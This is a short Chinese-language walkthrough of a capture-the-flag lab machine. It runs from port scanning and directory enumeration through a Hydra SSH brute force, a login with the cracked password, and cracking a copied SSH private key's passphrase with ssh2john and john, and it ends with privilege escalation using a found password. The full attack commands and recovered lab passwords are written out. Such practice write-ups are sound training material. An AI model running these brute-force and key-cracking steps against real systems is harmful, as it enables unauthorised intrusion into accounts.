在信息收集之前修改它的静态IP
登陆时按e
ctrl+x 进入编辑这个文件
将网卡名都改成ens33
信息收集
1.查看靶机的mac地址并把网络连接模式改为nat
2.主机发现
3.端口扫描
开放了22、80、139、445、8009、8080端口
4.访问80端口
5. dirsearch扫描目录,发现 development
getshell
1.拼接
2.发现了两个txt文件打开查看他
3.大致理解意思是 j 用户可能是个弱密码,可以尝试爆破22端口开放,大概率是ssh弱口令漏洞
enum4linux 192.168.42.189
4.Hydra爆破jan用户密码
hydra -l jan -P /home/kali/Desktop/password1.txt 192.168.42.189 ssh
5.爆破出来密码为armando并尝试远程登录
ssh jan@192.168.42.189
登录成功
提权
1.sudo -l查看当前没权限
2.查看用户家目录下,在kay目录下发现pass.pak和ssh公私钥文件
3.查看pass.pak文件,没有权限
4.发现没有权限,接着在 .ssh 文件目录下发现ssh的私钥和公钥文件且普通用户可以进行查看。
5.在kali中创建个key文件,给他一个执行权限并将私钥内容复制到其中保存,并利用 ssh2john 将 key 转换为哈希
chmod 600 key
ssh2john key > a.txt
cat a.txt
6.使用 john 进行解密,得到密码 beeswax
john --wordlist=/usr/share/wordlists/rockyou.txt a.txt
7.尝试私钥登录
ssh -i key kay@192.168.42.189
8.查看权限
9.发现是普通用户权限sudo -l提权
10.发现密码不对,查看之前的pass.pck文件
11.尝试这个查看权限
heresareallystrongpasswordthatfollowsthepasswordpolicy$$